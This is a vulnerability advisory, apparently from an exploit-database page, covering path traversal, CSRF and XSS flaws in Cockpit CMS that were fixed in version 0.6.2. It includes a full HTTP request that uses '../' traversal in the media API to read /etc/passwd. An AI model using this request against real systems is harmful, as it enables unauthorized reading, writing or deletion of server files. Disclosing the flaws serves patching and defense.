Cockpit CMS CSRF / XSS / Path Traversal Vulnerabilities

2018-10-1200:00:00

Simon Uvarov

0day.today

0.006 Low

EPSS

Percentile

78.4%

JSON

Cockpit CMS suffers from cross site request forgery, cross site scripting, and traversal vulnerabilities. Version 0.6.2 should address these issues.

#1 Path Traversal
CVE-2018-15540
It is possible to read/write/delete files or list directories by using "../" to traverse to other folders via requests to /cockpit/media/api

Example of a vulnerable request:

            POST /cockpit/media/api HTTP/1.1
            Host: 192.168.5.129
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
            Accept: */*
            Accept-Language: en-US,en;q=0.5
            Accept-Encoding: gzip, deflate
            Referer: http://192.168.5.129/cockpit/finder
            Content-Type: application/json; charset=UTF-8
            Content-Length: 53
            Cookie: 8071dec2be26139e39a170762581c00f=9me02iusm500432871pq0fjls2
            Connection: close

            {"cmd":"readfile","path":"../../../../../etc/passwd"}

#2 Application Wide CSRF
CVE-2018-15539
The application lacks anti-csrf protection mechanism, thus, an attacker is able to change API tokens and passwords.

#3 Application Wide XSS
CVE-2018-15538
The application is vulnerable to XSS attacks.

The mentioned issues were targeted in the 0.6.2 release.

Regards,
Simon Uvarov

#  0day.today [2018-10-13]  #

0.006 Low

EPSS

Percentile

78.4%

JSON

Related for 1337DAY-ID-31318